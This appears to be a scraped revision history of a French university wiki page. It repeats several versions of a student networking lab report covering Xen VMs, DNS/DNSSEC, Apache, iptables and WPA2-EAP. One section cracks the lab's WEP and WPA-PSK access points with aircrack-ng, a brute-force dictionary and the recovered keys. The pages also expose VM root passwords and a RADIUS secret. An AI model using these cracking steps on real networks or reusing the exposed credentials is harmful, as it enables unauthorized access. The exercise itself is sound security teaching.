EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
</syntaxhighlight><br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code><br />
<br />
<br />
Et ensuite sur le routeur :<syntaxhighlight lang="shell"><br />
conf t<br />
<br />
ip dhcp pool PoolCedric<br />
network 10.60.5.0 255.255.255.0<br />
dns-server 193.48.57.166<br />
default-router 10.60.5.254<br />
exit<br />
<br />
exit<br />
write<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12171
Atelier SysRes SE4 2025/2026 E5
2026-02-10T15:38:36Z
<p>Cpayet : /* Sécurisation WiFi par WPA2-EAP */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
</syntaxhighlight><br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code> <br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12169
Atelier SysRes SE4 2025/2026 E5
2026-02-10T15:37:47Z
<p>Cpayet : /* Sécurisation WiFi par WPA2-EAP */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
